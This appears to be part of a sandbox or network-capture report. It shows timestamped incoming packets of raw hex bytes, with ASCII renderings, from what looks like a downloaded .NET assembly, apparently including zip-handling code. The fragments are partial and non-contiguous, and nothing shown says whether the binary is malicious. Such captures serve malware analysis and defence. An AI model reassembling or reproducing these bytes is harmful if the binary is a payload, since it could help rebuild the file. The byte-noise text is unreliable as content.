2022-01-14 12:49:37 UTC	41	IN	Data Raw: 2a 5a 02 03 7d 5d 01 00 04 02 04 7d 5e 01 00 04 02 05 28 27 01 00 06 2a 13 30 05 00 49 00 00 00 00 00 00 00 02 7b 5b 01 00 04 2c 0b 72 74 14 00 70 73 f3 00 00 06 7a 02 73 3f 00 00 06 7d 5a 01 00 04 02 7b 5a 01 00 04 03 6f 5c 00 00 06 02 7b 5a 01 00 04 02 02 7b 5d 01 00 04 02 7b 5e 01 00 04 02 7b 5f 01 00 04 6f 5f 00 00 06 2a 82 02 7b 5a 01 00 04 2d 0b 72 05 15 00 70 73 f3 00 00 06 7a 02 7b 5a 01 00 04 03 6f 66 00 00 06 2a 72 02 7b 5a 01 00 04 2d 0b 72 05 15 00 70 73 f3 00 00 06 7a 02 14 7d 5a 01 00 04 16 2a 7e 02 7b 5a 01 00 04 2d 0b 72 05 15 00 70 73 f3 00 00 06 7a 02 7b 5a 01 00 04 6f 61 00 00 06 2a 86 02 7b 5a 01 00 04 2d 0b 72 05 15 00 70 73 f3 00 00 06 7a 02 7b 5a 01 00 04 03 04 6f 64 00 00 06 2a da 02 7b 5b 01 00 04 2c 0e 02 7b 5b 01 00 04 03 16 6f Data Ascii: Z}]}^('0I{[,rtpszs?}Z{Zo\{Z{]{^{_o_{Z-rpsz{Zofr{Z-rpsz}Z~{Z-rpsz{Zoa{Z-rpsz{Zod*{[,{[o
2022-01-14 12:49:37 UTC	42	IN	Data Raw: 78 00 00 0a 2a 8a 02 7b 6b 01 00 04 2c 0b 72 cf 15 00 70 73 70 00 00 0a 7a 02 7b 6a 01 00 04 03 04 05 6f 79 00 00 0a 2a 00 00 1b 30 03 00 2c 00 00 00 21 00 00 11 73 7a 00 00 0a 0a 06 16 1f 09 73 31 01 00 06 0b 02 07 28 14 01 00 06 06 6f 7b 00 00 0a 0c de 0a 06 2c 06 06 6f 13 00 00 0a dc 08 2a 01 10 00 00 02 00 06 00 1a 20 00 0a 00 00 00 00 1b 30 03 00 2c 00 00 00 21 00 00 11 73 7a 00 00 0a 0a 06 16 1f 09 73 31 01 00 06 0b 02 07 28 15 01 00 06 06 6f 7b 00 00 0a 0c de 0a 06 2c 06 06 6f 13 00 00 0a dc 08 2a 01 10 00 00 02 00 06 00 1a 20 00 0a 00 00 00 00 1b 30 02 00 25 00 00 00 22 00 00 11 02 73 7c 00 00 0a 0a 06 17 73 30 01 00 06 0b 02 07 28 16 01 00 06 0c de 0a 06 2c 06 06 6f 13 00 00 0a dc 08 2a 00 00 00 01 10 00 00 02 00 07 00 12 19 00 0a 00 00 00 00 1b Data Ascii: x{k,rpspz{joy0,!szs1(o{,o* 0,!szs1(o{,o* 0%"s\|s0(,o*
2022-01-14 12:49:37 UTC	44	IN	Data Raw: 00 06 11 05 17 5f 17 33 09 02 06 08 28 56 01 00 06 0c 11 05 17 64 13 05 11 05 2c 22 02 07 06 28 57 01 00 06 11 05 17 5f 17 33 09 02 07 08 28 56 01 00 06 0c 11 05 17 64 13 05 11 05 2d bc 08 09 61 0c 02 08 66 7d 71 01 00 04 2a 22 02 16 28 5a 01 00 06 2a 36 02 20 20 83 b8 ed 03 28 5b 01 00 06 2a 8a 02 15 7d 71 01 00 04 02 28 1e 00 00 0a 02 04 7d 6e 01 00 04 02 03 7d 6c 01 00 04 02 28 55 01 00 06 2a 22 02 15 7d 71 01 00 04 2a 3e 02 17 7e 72 01 00 04 03 14 28 62 01 00 06 2a 3e 02 04 7e 72 01 00 04 03 14 28 62 01 00 06 2a 6e 02 17 04 03 14 28 62 01 00 06 04 16 6a 2f 0b 72 d5 03 00 70 73 25 00 00 0a 7a 2a 6e 02 05 04 03 14 28 62 01 00 06 04 16 6a 2f 0b 72 d5 03 00 70 73 25 00 00 0a 7a 2a 72 02 05 04 03 0e 04 28 62 01 00 06 04 16 6a 2f 0b 72 d5 03 00 70 73 25 00 Data Ascii: _3(Vd,"(W_3(Vd-af}q"(Z6 ([}q(}n}l(U"}q>~r(b>~r(bn(bj/rps%zn(bj/rps%z*r(bj/rps%
2022-01-14 12:49:37 UTC	45	IN	Data Raw: 28 45 00 00 0a 2d 17 11 06 72 77 18 00 70 06 7b b4 03 00 04 6f 92 01 00 06 6f c4 00 00 0a 11 06 73 c5 00 00 0a 13 07 7e 89 01 00 04 06 fe 06 0c 05 00 06 73 c6 00 00 0a 28 01 00 00 2b 28 02 00 00 2b 13 08 11 08 2d 20 72 97 18 00 70 06 7b b4 03 00 04 6f 76 01 00 06 8c 2b 00 00 02 28 42 00 00 0a 73 cf 02 00 06 7a 73 c9 00 00 0a 13 09 11 09 6f ca 00 00 0a 11 05 6f cb 00 00 0a 6f cc 00 00 0a 26 11 08 7b b1 03 00 04 2c 41 11 08 7b b1 03 00 04 6f cd 00 00 0a 13 0f 2b 18 12 0f 28 ce 00 00 0a 13 10 11 09 6f ca 00 00 0a 11 10 6f cc 00 00 0a 26 12 0f 28 cf 00 00 0a 2d df de 0e 12 0f fe 16 16 00 00 1b 6f 13 00 00 0a dc 11 09 16 6f d0 00 00 0a 11 09 17 6f d1 00 00 0a 11 09 16 6f d2 00 00 0a 11 09 72 67 01 00 70 6f d3 00 00 0a 28 d4 00 00 0a 13 0a 73 1f 00 00 0a 13 0b Data Ascii: (E-rwp{oos~s(+(+- rp{ov+(Bszsooo&{,A{o+(oo&(-oooorgpo(s
2022-01-14 12:49:37 UTC	46	IN	Data Raw: a1 03 00 06 13 1a 11 1a 2d 12 72 42 17 00 70 11 19 28 42 00 00 0a 73 d3 02 00 06 7a 11 1a 73 dc 00 00 0a 13 1b 38 d6 00 00 00 11 1b 6f dd 00 00 0a 13 1c 11 13 2c 10 11 1c 72 67 1f 00 70 11 13 6f 36 00 00 0a 13 1c 11 1c 72 8b 1f 00 70 06 7b b4 03 00 04 6f 82 01 00 06 13 1d 12 1d 28 de 00 00 0a 6f 36 00 00 0a 13 1c 11 1c 72 b9 1f 00 70 06 7b b4 03 00 04 6f 7e 01 00 06 13 1d 12 1d 28 de 00 00 0a 6f 36 00 00 0a 13 1c 06 7b b4 03 00 04 6f 8e 01 00 06 28 45 00 00 0a 2d 19 11 1c 72 c9 1f 00 70 06 7b b4 03 00 04 6f 8e 01 00 06 6f 36 00 00 0a 13 1c 11 1c 72 f7 1f 00 70 06 7b b4 03 00 04 6f 80 01 00 06 13 1e 12 1e 28 df 00 00 0a 6f 36 00 00 0a 13 1c 11 14 2c 10 11 1c 72 27 20 00 70 11 14 6f 36 00 00 0a 13 1c 11 0b 11 1c 6f 20 00 00 0a 72 e4 19 00 70 6f 20 00 00 0a Data Ascii: -rBp(Bszs8o,rgpo6rp{o(o6rp{o~(o6{o(E-rp{oo6rp{o(o6,r' po6o rpo
2022-01-14 12:49:37 UTC	48	IN	Data Raw: 28 26 00 00 0a a2 25 18 08 a2 25 19 03 a2 28 f0 00 00 0a 0d 02 09 28 d6 00 00 0a 0a 06 28 3f 00 00 0a 2d a8 06 28 31 00 00 0a 2d a0 06 2a 26 02 03 14 28 9b 01 00 06 2a ce 03 28 3f 00 00 0a 2c 09 02 03 04 28 9d 01 00 06 2a 03 28 31 00 00 0a 2c 09 02 03 04 28 ba 01 00 06 2a 72 ae 22 00 70 03 28 42 00 00 0a 73 f7 00 00 0a 7a 26 02 03 14 28 9d 01 00 06 2a 13 30 03 00 31 00 00 00 4e 00 00 11 03 04 28 85 03 00 06 0a 03 06 28 87 03 00 06 0b 02 28 de 01 00 06 2c 11 02 28 f2 01 00 06 72 08 23 00 70 03 6f c0 00 00 0a 02 07 28 b0 01 00 06 2a 00 00 00 1b 30 02 00 3a 00 00 00 4f 00 00 11 03 2d 0b 72 24 23 00 70 73 63 00 00 0a 7a 03 6f f8 00 00 0a 0a 2b 0e 06 6f 18 00 00 0a 0b 02 07 28 1d 02 00 06 06 6f 17 00 00 0a 2d ea de 0a 06 2c 06 06 6f 13 00 00 0a dc 2a 00 00 01 Data Ascii: (&%%(((?-(1-&((?,((1,(r"p(Bsz&(01N(((,(r#po(0:O-r$#psczo+o(o-,o*
2022-01-14 12:49:37 UTC	49	IN	Data Raw: 02 03 04 05 28 af 01 00 06 2a 42 02 03 28 b6 01 00 06 02 03 04 28 ad 01 00 06 2a 00 13 30 02 00 48 00 00 00 54 00 00 11 03 28 45 00 00 0a 2c 0b 72 58 23 00 70 73 63 00 00 0a 7a 14 0a 03 1f 5c 6f 39 00 00 0a 15 2e 0f 03 28 66 00 00 0a 0a 03 28 3a 00 00 0a 10 01 03 06 28 85 03 00 06 0b 02 07 28 18 02 00 06 2c 07 02 07 28 1f 02 00 06 2a 13 30 03 00 23 00 00 00 52 00 00 11 04 2d 10 72 6c 23 00 70 72 86 23 00 70 73 43 00 00 0a 7a 04 73 7c 00 00 0a 0a 02 03 06 28 ad 01 00 06 2a 42 02 03 28 b6 01 00 06 02 03 04 28 b7 01 00 06 2a 26 02 03 14 28 ba 01 00 06 2a 2a 02 03 04 16 28 bc 01 00 06 2a 00 00 00 13 30 04 00 7b 00 00 00 53 00 00 11 03 28 86 03 00 06 0a 06 02 73 48 04 00 06 7d 67 02 00 04 06 6f 8d 03 00 06 06 02 28 ee 01 00 06 6f 82 03 00 06 06 02 28 f0 01 00 Data Ascii: (B((0HT(E,rX#pscz\o9.(f(:((,(0#R-rl#pr#psCzs\|(B((&((0{S(sH}go(o(
2022-01-14 12:49:37 UTC	50	IN	Data Raw: 6f 20 02 00 06 14 0b 08 16 fe 01 03 5f 2c 1e 02 28 07 01 00 0a 13 07 72 3d 26 00 70 11 07 28 42 00 00 0a 13 07 06 11 07 6f 5c 02 00 06 de 13 06 2c 06 06 6f 20 02 00 06 07 2c 06 07 6f 20 02 00 06 dc 08 2a 00 00 41 4c 00 00 02 00 00 00 3d 00 00 00 71 01 00 00 ae 01 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 28 00 00 00 9f 01 00 00 c7 01 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 06 00 00 00 fb 01 00 00 01 02 00 00 13 00 00 00 00 00 00 00 1b 30 02 00 28 00 00 00 57 00 00 11 73 10 02 00 06 0a 06 17 6f c5 01 00 06 06 02 6f 14 02 00 06 06 02 6f 5c 02 00 06 de 0a 06 2c 06 06 6f 13 00 00 0a dc 2a 01 10 00 00 02 00 06 00 17 1d 00 0a 00 00 00 00 1b 30 03 00 5e 00 00 00 58 00 00 11 16 0a 02 28 47 02 00 06 0b 07 6f 74 02 00 06 0c 2b 23 08 6f 18 00 00 0a 0d 09 6f 6f 03 Data Ascii: o _,(r=&p(Bo\,o ,o AL=q(0(Wsooo\,o0^X(Got+#ooo
2022-01-14 12:49:37 UTC	52	IN	Data Raw: 2e 0c 12 02 fe 15 1a 00 00 1b 08 0c de 2c 07 7b 6f 02 00 04 2c 09 17 73 0e 01 00 0a 0c de 1b 06 6f 17 00 00 0a 2d cb de 0a 06 2c 06 06 6f 13 00 00 0a dc 16 73 0e 01 00 0a 2a 08 2a 01 10 00 00 02 00 20 00 39 59 00 0a 00 00 00 00 4a 02 7b bb 01 00 04 17 33 07 02 7b ba 01 00 04 2a 14 2a 3e 02 03 7d ba 01 00 04 02 17 7d bb 01 00 04 2a 1e 02 7b ba 01 00 04 2a 22 02 03 7d ba 01 00 04 2a 1e 02 7b bb 01 00 04 2a 22 02 03 7d bb 01 00 04 2a 1e 02 7b 92 01 00 04 2a 22 02 03 7d 92 01 00 04 2a 1e 02 7b ad 01 00 04 2a 96 02 03 7d ad 01 00 04 03 2d 01 2a 03 28 31 00 00 0a 2d 11 72 0f 28 00 70 03 28 42 00 00 0a 73 f7 00 00 0a 7a 2a 9e 02 03 7d a4 01 00 04 02 7b a4 01 00 04 2d 08 02 16 28 fd 01 00 06 2a 02 28 fc 01 00 06 2d 07 02 17 28 fd 01 00 06 2a 1e 02 7b a4 01 00 04 Data Ascii: .,{o,so-,os 9YJ{3{>}}{"}{"}{"}{}-(1-r(p(Bsz}{-((-({
2022-01-14 12:49:37 UTC	53	IN	Data Raw: 28 ab 00 00 0a 7d ba 01 00 04 02 18 28 f1 01 00 06 2b 0b 02 28 72 02 00 06 7d ba 01 00 04 02 14 14 28 15 02 00 06 2a 00 00 00 13 30 03 00 61 00 00 00 00 00 00 00 02 17 7d a5 01 00 04 02 1e 7d a8 01 00 04 02 17 7d ae 01 00 04 02 73 1e 00 00 0a 7d af 01 00 04 02 15 6a 7d b5 01 00 04 02 7e c2 01 00 04 7d bc 01 00 04 02 1f 10 7d bf 01 00 04 02 1f 9d 6a 7d c5 01 00 04 02 28 1e 00 00 0a 02 03 28 ef 01 00 06 02 18 28 f1 01 00 06 02 14 14 28 15 02 00 06 2a 00 00 00 1b 30 03 00 8f 00 00 00 5d 00 00 11 02 17 7d a5 01 00 04 02 1e 7d a8 01 00 04 02 17 7d ae 01 00 04 02 73 1e 00 00 0a 7d af 01 00 04 02 15 6a 7d b5 01 00 04 02 7e c2 01 00 04 7d bc 01 00 04 02 1f 10 7d bf 01 00 04 02 1f 9d 6a 7d c5 01 00 04 02 28 1e 00 00 0a 28 72 02 00 06 2d 14 02 28 ab 00 00 0a 7d ba Data Ascii: (}(+(r}(0a}}}s}j}~}}j}((((0]}}}s}j}~}}j}((r-(}
2022-01-14 12:49:37 UTC	54	IN	Data Raw: 44 00 00 00 00 00 00 00 02 7b 95 01 00 04 2d 35 02 7b a2 01 00 04 2d 08 02 7b a1 01 00 04 2c 25 02 02 7b a2 01 00 04 25 2d 07 26 02 7b a1 01 00 04 19 17 19 28 1f 01 00 0a 7d 95 01 00 04 02 17 7d ae 01 00 04 02 7b 95 01 00 04 2a 13 30 03 00 71 00 00 00 00 00 00 00 02 7b 96 01 00 04 2c 07 02 7b 96 01 00 04 2a 02 7b a1 01 00 04 2d 07 02 7b 96 01 00 04 2a 02 7b 9a 01 00 04 2c 1e 02 02 7b a1 01 00 04 02 7b 9a 01 00 04 28 5d 04 00 06 7d 96 01 00 04 02 7b 96 01 00 04 2a 02 28 f4 01 00 06 25 2d 0c 26 02 7b a1 01 00 04 28 66 00 00 0a 02 7c 96 01 00 04 02 7c aa 01 00 04 28 f4 02 00 06 02 7b 96 01 00 04 2a 5a 03 2c 0b 72 52 2b 00 70 73 d3 02 00 06 7a 02 14 7d 96 01 00 04 2a 56 02 7b a1 01 00 04 2d 06 72 a8 2b 00 70 2a 02 7b a1 01 00 04 2a 00 00 13 30 03 00 29 00 00 Data Ascii: D{-5{-{,%{%-&{(}}{0q{,{{-{{,{{(]}{(%-&{(f\|\|({Z,rR+psz}V{-r+p{0)
2022-01-14 12:49:37 UTC	56	IN	Data Raw: 07 6f 94 02 00 06 2c 07 02 17 7d b1 01 00 04 02 7b b1 01 00 04 2a 13 30 03 00 36 00 00 00 66 00 00 11 02 7b c6 01 00 04 0a 06 2c 25 02 28 25 02 00 06 03 04 28 b5 02 00 06 0b 06 02 07 6f 25 01 00 0a 07 6f 94 02 00 06 2c 07 02 17 7d b1 01 00 04 02 7b b1 01 00 04 2a 00 00 13 30 03 00 20 00 00 00 66 00 00 11 02 7b c6 01 00 04 0a 06 2c 15 02 28 25 02 00 06 03 28 b8 02 00 06 0b 06 02 07 6f 25 01 00 0a 2a 13 30 03 00 20 00 00 00 66 00 00 11 02 7b c6 01 00 04 0a 06 2c 15 02 28 25 02 00 06 03 28 b7 02 00 06 0b 06 02 07 6f 25 01 00 0a 2a 13 30 03 00 29 00 00 00 67 00 00 11 02 7b c7 01 00 04 0a 06 0b 07 03 28 20 01 00 0a 74 05 00 00 1b 0c 02 7c c7 01 00 04 08 07 28 06 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 67 00 00 11 02 7b c7 01 00 04 0a 06 0b Data Ascii: o,}{06f{,%(%(o%o,}{0 f{,(%(o%0 f{,(%(o%0)g{( t\|(+3*0)g{
2022-01-14 12:49:37 UTC	57	IN	Data Raw: 03 2d 0b 72 d4 2c 00 70 73 63 00 00 0a 7a 02 03 6f ec 03 00 06 03 6f ee 03 00 06 03 6f ea 03 00 06 28 49 02 00 06 2a 00 13 30 03 00 5d 00 00 00 57 00 00 11 73 10 02 00 06 0a 06 04 25 2d 06 26 28 72 02 00 06 6f ef 01 00 06 06 18 6f f1 01 00 06 06 03 7d 92 01 00 04 06 02 7d a1 01 00 04 05 2c 07 06 05 7d c4 01 00 04 06 6f de 01 00 06 2c 11 06 7b 92 01 00 04 72 e4 2c 00 70 02 6f c0 00 00 0a 06 28 4d 02 00 06 06 17 7d a9 01 00 04 06 2a 2a 02 14 14 14 28 4c 02 00 06 2a 9e 03 2d 0b 72 d4 2c 00 70 73 63 00 00 0a 7a 02 03 6f ec 03 00 06 03 6f ee 03 00 06 03 6f ea 03 00 06 28 4c 02 00 06 2a 13 30 03 00 7a 00 00 00 57 00 00 11 02 2d 0b 72 0c 2d 00 70 73 63 00 00 0a 7a 73 10 02 00 06 0a 06 03 7d 92 01 00 04 06 04 25 2d 06 26 28 72 02 00 06 7d ba 01 00 04 06 18 7d bb Data Ascii: -r,psczooo(I0]Ws%-&(roo}},}o,{r,po(M}(L-r,psczooo(L*0zW-r-psczs}%-&(r}}
2022-01-14 12:49:37 UTC	58	IN	Data Raw: 8c 2f 00 70 06 6f 5b 03 00 06 6f c0 00 00 0a 02 7b 9e 01 00 04 06 6f 5b 03 00 06 06 6f ff 00 00 0a 02 7b 9f 01 00 04 06 6f 5b 03 00 06 6f 00 01 00 0a 2d 12 02 7b 9f 01 00 04 06 6f 5b 03 00 06 06 6f ff 00 00 0a 16 0b 08 07 28 c2 03 00 06 25 0a 2d 9e 00 28 12 01 00 0a 73 2e 01 00 0a 13 04 2b 41 02 7b 9e 01 00 04 09 6f 5b 03 00 06 6f 17 01 00 0a 13 05 11 05 2c 1c 11 05 09 6f 62 03 00 06 7d 56 02 00 04 09 6f 6f 03 00 06 2c 07 11 05 6f 8d 03 00 06 11 04 09 6f 5b 03 00 06 14 6f 2f 01 00 0a 02 11 04 28 44 03 00 06 25 0d 2d b3 02 7b b5 01 00 04 16 6a 31 13 02 6f 22 02 00 06 02 7b b5 01 00 04 16 6f ba 00 00 0a 26 02 28 52 02 00 06 02 6f de 01 00 06 2c 23 02 6f d8 01 00 06 28 45 00 00 0a 2d 16 02 6f f2 01 00 06 72 da 2e 00 70 02 6f d8 01 00 06 6f c0 00 00 0a de 06 Data Ascii: /po[o{o[o{o[o-{o[o(%-(s.+A{o[o,ob}Voo,oo[o/(D%-{j1o"{o&(Ro,#o(E-or.poo
2022-01-14 12:49:37 UTC	60	IN	Data Raw: 11 05 6f 18 00 00 0a 13 06 02 07 11 06 17 28 29 02 00 06 11 06 02 28 23 02 00 06 6f e1 03 00 06 02 7b b0 01 00 04 2c 02 de 4b 07 17 58 0b 02 07 11 06 16 28 29 02 00 06 02 7b b0 01 00 04 2c 02 de 33 11 06 6f 7a 03 00 06 2c 13 06 11 06 6f 65 03 00 06 13 07 12 07 28 0f 01 00 0a 60 0a 11 05 6f 17 00 00 0a 2d 99 de 0c 11 05 2c 07 11 05 6f 13 00 00 0a dc 02 7b b0 01 00 04 2c 05 dd be 01 00 00 02 28 23 02 00 06 75 58 00 00 02 0d 02 09 2d 03 17 2b 06 09 6f 61 04 00 06 7d 9b 01 00 04 02 28 23 02 00 06 08 02 7b 9b 01 00 04 02 7b c0 01 00 04 02 28 d8 01 00 06 02 73 48 04 00 06 28 f1 03 00 06 13 04 02 1f 0c 28 2a 02 00 06 02 17 7d ac 01 00 04 02 16 7d ab 01 00 04 06 11 04 60 0a 02 06 73 0e 01 00 0a 7d b8 01 00 04 02 7b a9 01 00 04 2c 1a 02 7b 95 01 00 04 2c 12 02 7b Data Ascii: o()(#o{,KX(){,3oz,oe(`o-,o{,(#uX-+oa}(#{{(sH((*}}`s}{,{,{
2022-01-14 12:49:37 UTC	61	IN	Data Raw: 0a 10 02 04 72 83 03 00 70 6f 57 00 00 0a 2d e2 02 28 de 01 00 06 2c 12 02 28 f2 01 00 06 72 d6 33 00 70 03 04 6f 01 01 00 0a 03 02 28 c8 01 00 06 73 2c 00 00 06 04 0e 04 6f 37 00 00 06 0a 02 28 de 01 00 06 2c 1b 02 28 f2 01 00 06 72 28 34 00 70 06 6f 36 01 00 0a 8c 6a 00 00 01 6f c0 00 00 0a 02 28 3e 02 00 06 0e 05 2d 03 16 2b 01 17 0b 06 6f 37 01 00 0a 0c 2b 4d 08 6f fa 00 00 0a 0d 05 2c 0f 09 28 66 00 00 0a 04 05 28 67 02 00 06 2b 01 14 13 04 09 28 3f 00 00 0a 2c 1c 0e 05 2c 0c 02 09 11 04 28 a6 01 00 06 26 2b 19 02 09 11 04 28 9d 01 00 06 26 2b 0d 02 09 11 04 07 16 16 28 be 01 00 06 26 08 6f 17 00 00 0a 2d ab de 0a 08 2c 06 08 6f 13 00 00 0a dc 02 28 3f 02 00 06 2a 01 10 00 00 02 00 ae 00 59 07 01 0a 00 00 00 00 13 30 03 00 2a 00 00 00 07 00 00 11 02 Data Ascii: rpoW-(,(r3po(s,o7(,(r(4po6jo(>-+o7+Mo,(f(g+(?,,(&+(&+(&o-,o(?Y0
2022-01-14 12:49:37 UTC	62	IN	Data Raw: 22 02 03 7d ea 01 00 04 2a 1e 02 7b ec 01 00 04 2a 22 02 03 7d ec 01 00 04 2a 1e 02 7b eb 01 00 04 2a 3e 02 02 7b eb 01 00 04 03 60 7d eb 01 00 04 2a 1e 02 7b ed 01 00 04 2a 22 02 03 7d ed 01 00 04 2a 1e 02 7b ee 01 00 04 2a 22 02 03 7d ee 01 00 04 2a 1e 02 7b ef 01 00 04 2a 22 02 03 7d ef 01 00 04 2a 1e 02 7b f0 01 00 04 2a 22 02 03 7d f0 01 00 04 2a 1e 02 28 8e 02 00 06 2a 26 02 03 04 28 8f 02 00 06 2a 3e 02 1a 73 9f 02 00 06 25 03 6f 91 02 00 06 2a 5a 02 1b 73 9f 02 00 06 25 04 6f 91 02 00 06 25 03 6f 93 02 00 06 2a 22 02 19 73 9f 02 00 06 2a 76 02 1d 73 9f 02 00 06 25 03 6f 93 02 00 06 25 04 6f 9b 02 00 06 25 05 6f 9d 02 00 06 2a 22 02 1c 73 9f 02 00 06 2a 5a 02 17 73 a6 02 00 06 25 04 6f 91 02 00 06 25 03 6f 93 02 00 06 2a 22 02 16 73 a6 02 00 06 2a Data Ascii: "}{"}{>{`}{"}{"}{"}{"}(&(>s%oZs%o%o"svs%o%o%o"sZs%o%o"s
2022-01-14 12:49:37 UTC	64	IN	Data Raw: 00 0a 0a de 03 26 de 00 06 2d 10 20 e4 04 00 00 28 39 01 00 0a 0a de 03 26 de 00 02 06 28 e8 02 00 06 2a 00 00 00 01 1c 00 00 00 00 02 00 0d 0f 00 03 2f 00 00 01 00 00 15 00 0d 22 00 03 2f 00 00 01 32 02 7e fd 01 00 04 28 eb 02 00 06 2a 22 03 02 6f 42 01 00 0a 2a 00 00 1b 30 02 00 15 00 00 00 13 00 00 11 16 0a 02 72 dc 37 00 70 28 ef 02 00 06 0a de 03 26 de 00 06 2a 00 00 00 01 10 00 00 00 00 02 00 0e 10 00 03 3c 00 00 02 1b 30 03 00 71 00 00 00 13 00 00 11 16 0a 02 72 dc 37 00 70 28 ef 02 00 06 0a 06 20 50 4b 07 08 33 54 02 1f 0c 6a 17 6f ba 00 00 0a 26 02 72 dc 37 00 70 28 ef 02 00 06 0a 06 20 50 4b 03 04 2e 35 02 1e 6a 17 6f ba 00 00 0a 26 02 72 dc 37 00 70 28 ef 02 00 06 0a 06 20 50 4b 03 04 2e 17 02 1f e8 6a 17 6f ba 00 00 0a 26 02 72 dc 37 00 70 28 Data Ascii: &- (9&(/"/2~("oB0r7p(&<0qr7p( PK3Tjo&r7p( PK.5jo&r7p( PK.jo&r7p(
2022-01-14 12:49:37 UTC	80	IN	Data Raw: 00 01 00 00 5a 20 00 01 00 00 5a 58 08 11 04 25 17 58 13 04 91 20 00 01 00 00 5a 20 00 01 00 00 5a 20 00 01 00 00 5a 58 6e 7d 5b 02 00 04 11 0a 02 7b 59 02 00 04 fe 01 16 fe 01 13 09 11 09 2c 17 02 6f 91 03 00 06 1f f4 6a 17 6f ba 00 00 0a 26 11 0a 1a 6a 58 13 0a 11 09 3a c6 fd ff ff 02 6f 91 03 00 06 11 08 16 6f ba 00 00 0a 26 02 25 7b 6e 02 00 04 02 7b 6f 02 00 04 2d 04 1f 10 2b 02 1f 18 58 7d 6e 02 00 04 02 02 7b 59 02 00 04 7d 5a 02 00 04 02 7b 52 02 00 04 17 5f 17 40 9f 00 00 00 02 6f 71 03 00 06 18 2e 09 02 6f 71 03 00 06 19 33 5c 02 7b 74 02 00 04 28 93 03 00 06 13 0d 02 14 11 0d 02 6f 91 03 00 06 28 0c 03 00 06 7d 43 02 00 04 06 02 7b 43 02 00 04 6f 10 03 00 06 1f 0a 59 58 0a 02 25 7b 5a 02 00 04 02 7b 43 02 00 04 6f 10 03 00 06 6a 59 7d 5a 02 00 Data Ascii: Z ZX%X Z Z ZXn}[{Y,ojo&jX:oo&%{n{o-+X}n{Y}Z{R_@oq.oq3\{t(o(}C{CoYX%{Z{CojY}Z
2022-01-14 12:49:37 UTC	96	IN	Data Raw: 12 04 00 06 2a 00 13 30 03 00 6a 00 00 00 00 00 00 00 02 03 6f 74 00 00 0a 2d 08 03 73 f9 02 00 06 2b 01 03 7d c8 02 00 04 02 1c 28 1e 04 00 06 02 1e 28 20 04 00 06 02 16 7d c4 02 00 04 02 28 12 01 00 0a 73 13 01 00 0a 7d cb 02 00 04 02 16 7d ca 02 00 04 02 04 7d cf 02 00 04 02 16 28 1a 04 00 06 02 05 25 2d 06 26 72 a8 2b 00 70 7d d9 02 00 04 02 15 6a 28 31 04 00 06 2a 72 72 6a 5c 00 70 02 7b d9 02 00 04 02 7b cf 02 00 04 8c 83 00 00 01 28 71 00 00 0a 2a 00 13 30 02 00 41 00 00 00 00 00 00 00 02 7b d0 02 00 04 2c 12 02 17 7d d1 02 00 04 72 1a 5c 00 70 73 10 01 00 0a 7a 02 03 7d c6 02 00 04 02 7b c6 02 00 04 2d 08 02 16 7d c4 02 00 04 2a 02 7b c4 02 00 04 2d 07 02 17 7d c4 02 00 04 2a 1e 02 7b c4 02 00 04 2a e2 02 7b d0 02 00 04 2c 12 02 17 7d d1 02 00 04 Data Ascii: 0jot-s+}(( }(s}}}(%-&r+p}j(1rrj\p{{(q0A{,}r\psz}{-}{-}{{,}
2022-01-14 12:49:37 UTC	112	IN	Data Raw: 00 00 01 25 4a 13 04 11 04 17 58 54 11 04 06 9e 06 17 58 0a 06 09 31 d1 02 7b 0e 03 00 04 16 32 0b 02 7b 0e 03 00 04 08 8e 69 32 0b 72 08 64 00 70 73 91 01 00 0a 7a 02 08 02 7b 0e 03 00 04 94 7d 23 03 00 04 02 16 7d 1c 03 00 04 02 16 7d 1f 03 00 04 02 20 00 01 00 00 7d 1d 03 00 04 02 7b 10 03 00 04 2c 15 02 16 7d 21 03 00 04 02 16 7d 22 03 00 04 02 28 c3 04 00 06 2a 02 28 c4 04 00 06 2a 13 30 04 00 ec 00 00 00 15 00 00 11 02 7b 1f 03 00 04 02 7b 0d 03 00 04 3d c8 00 00 00 02 02 7b 1d 03 00 04 7d 1e 03 00 04 02 7b 25 03 00 04 7b f9 03 00 04 02 7b 23 03 00 04 91 20 ff 00 00 00 5f 0a 02 02 7b 25 03 00 04 7b f8 03 00 04 02 7b 23 03 00 04 94 7d 23 03 00 04 02 7b 21 03 00 04 2d 34 02 02 7b 22 03 00 04 28 ff 04 00 06 17 59 7d 21 03 00 04 02 02 7b 22 03 00 04 17 Data Ascii: %JXTX1{2{i2rdpsz{}#}} }{,}!}"((0{{={}{%{{# _{%{{#}#{!-4{"(Y}!{"
2022-01-14 12:49:37 UTC	128	IN	Data Raw: 12 00 81 21 00 00 00 00 86 18 66 58 06 00 13 00 18 26 00 00 00 00 83 08 91 38 7f 00 13 00 bc 26 00 00 00 00 83 08 a5 38 10 00 13 00 9c 28 00 00 00 00 c6 00 b9 38 7f 00 14 00 ec 28 00 00 00 00 81 00 c0 28 30 16 14 00 14 29 00 00 00 00 c3 02 55 2e f0 00 16 00 44 29 00 00 00 00 81 00 54 2e 38 16 17 00 b0 29 00 00 00 00 c3 02 55 2e 1e 16 18 00 81 21 00 00 00 00 86 18 66 58 06 00 19 00 cb 29 00 00 00 00 83 08 03 6b 3e 16 19 00 d3 29 00 00 00 00 83 08 0d 6b 43 16 19 00 f8 29 00 00 00 00 c3 02 55 2e f0 00 1a 00 70 2a 00 00 00 00 c6 00 b9 38 7f 00 1b 00 08 2b 00 00 00 00 c3 02 55 2e 1e 16 1b 00 81 21 00 00 00 00 86 18 66 58 06 00 1c 00 73 2b 00 00 00 00 86 18 66 58 10 00 1c 00 7d 2b 00 00 00 00 86 18 66 58 72 00 1d 00 a0 2b 00 00 00 00 86 08 23 0f 7f 00 1f 00 b7 Data Ascii: !fX&8&8(8((0)U.D)T.8)U.!fX)k>)kC)U.p*8+U.!fXs+fX}+fXr+#
